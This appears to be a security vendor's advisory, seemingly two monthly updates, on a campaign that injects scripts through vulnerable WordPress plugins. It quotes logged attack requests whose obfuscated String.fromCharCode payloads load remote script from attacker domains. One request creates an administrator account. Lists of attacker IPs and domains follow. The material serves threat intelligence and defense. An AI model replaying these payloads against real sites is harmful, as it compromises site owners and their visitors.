Author: John Castro

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites:

• Multi-Vector Attack in Server Logs: March 2019

• Malware Campaign Evolves to Target New Plugins: May 2019

• Plugins Under Attack: June 2019

This month they added seven new plugins and continued attacking old ones.

Plugins targeted: July 2019

• WordPress Plugin Appointment Booking Calendar

• Sticky Menu on Scroll, Sticky Header for Any Theme

• File Manager

• Appointment Booking Calendar

• Folders – Organize Media Library Folders

• Simple Staff List

• Mobile App Canvas Plugin

Plugins that are continuing to be leveraged by attackers for months are:

• WP Live Chat Support

• Yellow Pencil Visual Theme Customizer

• Social Warfare

• Yuzo Related Post

• WP-Piwik

• Live Chat with Facebook Messenger

 

Payloads added to the campaign

 

WordPress Plugin Appointment Booking Calendar

185.225.16.152 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [22/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1" 

---

myStickymenumyStickymenu

 

185.225.16.152 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [11/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

---

File Manager

 

192.169.157.142 - - [23/Jul/2019] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392 HTTP/1.1"

---

Appointment Booking Calendar

 

192.169.157.142 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [26/Jul/2019:] "POST /wp-admin/admin-post.php HTTP/1.1"

---

FoldersFolders

 

192.169.157.142 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

---

Simple Staff List

 

192.169.157.142 - _staff_listing_default_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-post.php?action=save&updated=true HTTP/1.1"

---

Mobile App

 

192.169.157.142 - canvas_editor_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String...skipped...99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&ssn_submit=1 [26/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

 
 
 

Malicious Domains and IPs:

 

IPs:

192.169.157.142
185.225.16.152
178.128.57.173
185.238.0.146
185.238.0.135
45.12.32.55 
185.238.0.133
185.238.0.132
45.12.32.56
185.238.0.146
45.67.229.126
192.232.194.4

 
 

Domains Injected:

 

• greatfacebookpage[.]com
• greatinstagrampage[.]com
• destroyforme[.]com

As always, we strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

A long-lasting malware campaign (1,2) targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites.

As part of a strategy to rotate attack vectors and compromise as many sites as possible, we found a number of new plugins added to this campaign during this past month:

Plugins Under Attack

• WP-Piwik
• Blog Designer
• WP Support Plus Responsive Ticket System
• Convert Plus Plugin
• Live Chat with Facebook Messenger
• Wp Quick Booking Manager
• Post Custom Templates Lite
• Wp File Manager

The plugins that are continuing to be leveraged and appear to be giving attackers the best results include:

• WP Live Chat Support
• Yellow Pencil Visual Theme Customizer
• Social Warfare
• Yuzo Related Post

Samples Attack Requests

WP-Piwik

45.67.228.17 - wp-piwik%5Btrack_mode%5D=manually&wp-piwik%5Btracking_code%5D=%3Cscript+type%3Dtext%2Fjavascript+async%3Dtrue%3Evar+nt+%3D+String.fromCharCode%2898%2C+98%2C+98%2C+55%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3B...skipped...%2Cn%29%3B%3C%2Fscript%3E [25/Jun/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Blog Designer

45.67.228.14 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+async%3Dtrue+type%3Dtext%2Fjavascript%3Evar+nt+%3D+String.fromCharCode%2898%2C+98%2C+98%2C+51%29%3Bvar+mb+%3D+String.fromChar...skipped...2C+114%2C+105%2C+112%2C+116%2C+38%2C+118%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Dlb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&updated=true [25/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WP Support Plus Responsive Ticket System

91.121.54.71 - action=wpsp_upload_attachment [23/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Convert Plus Plugin

68.183.131.57 - action=cp_add_subscriber&cp_set_user=administrator&cp_set_user=administrator&message=hello&message=letitbe&param%5Bemail%5D=workspace%40kleverandeverbever.top&param%5Bemail%5D=workspace%40kleverandeverbever.top [16/Jun/2019:02:37:42 +0000] "POST /wp-admin/admin-ajax.php?action=cp_add_subscriber HTTP/1.1" 

Live Chat with Facebook Messenger

46.105.102.54 - domain=%3C%2Fscript%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%2C+39%2C+41%2C+59%2C+32%2C+10%2C+115%2C+46%2C+116%2C+12...skipped...+101%2C+40%2C+39%2C+104%2C+101%2C+97%2C+100%2C+39%2C+41%2C+91%2C+48%2C+93%2C+46%2C+97%2C+112%2C+112%2C+101%2C+110%2C+100%2C+67%2C+104%2C+105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E%3Cscript%3E [07/Jun/2019:14:01:05 +0000] "POST /wp-admin/admin-ajax.php?action=update_zb_fbc_code HTTP/1.1"

WP Quick Booking Manager

46.105.102.54 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+101%2C+109%2C+101%2C+110%2C+116%2C+40%2C+39%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%2C+39%2C+41%2C+59%2C+32%2C+...skipped...5%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [07/Jun/2019:14:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

46.105.102.54 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=%3C%2Ftextarea%3E%3Cscript+language%3Djavascript%3Eeval%28String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+100%2C+61%2C+100%2C+111%2C+99%2C+117%2C+109%2C+101%2C+110%2C+116%2C+59%2C+118%2C+97%2C+114%2C+32%2C+115%2C+61%2C+100%2C+46%2C+99%2C+114%2C+101%2C+97%2C+116%2C+101%2C+69%2C+108%2C+...skipped...%2C+84%2C+97%2C+103%2C+78%2C+97%2C+109%2C+101%2C+40%2C+39%2C+104%2C+101%2C+97%2C+100%2C+39%2C+41%2C+91%2C+48%2C+93%2C+46%2C+97%2C+112%2C+112%2C+101%2C+110%2C+100%2C+67%2C+104%2C+105%2C+108%2C+100%2C+40%2C+115%2C+41%2C+59%2C+10%2C+125%29%29%3B%3C%2Fscript%3E [07/Jun/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Wp File Manager

79.116.192.67 - action=mk_check_filemanager_php_syntax [01/Jun/2019] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Malicious Domains and IPs

IPs

45.67.228.15
45.67.229.14
45.67.228.17
109.96.171.178
91.121.54.71
185.238.1.175
185.238.1.179
185.238.1.176
185.238.1.53
68.183.131.57
46.105.102.54
185.238.1.53
185.212.129.164
185.238.0.153
162.254.253.193
79.116.192.67

Domains

deliverygoodstrategy[.]com
letsmakesomechoice[.]com
garrygudini[.]com
kleverandeverbever[.]top

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.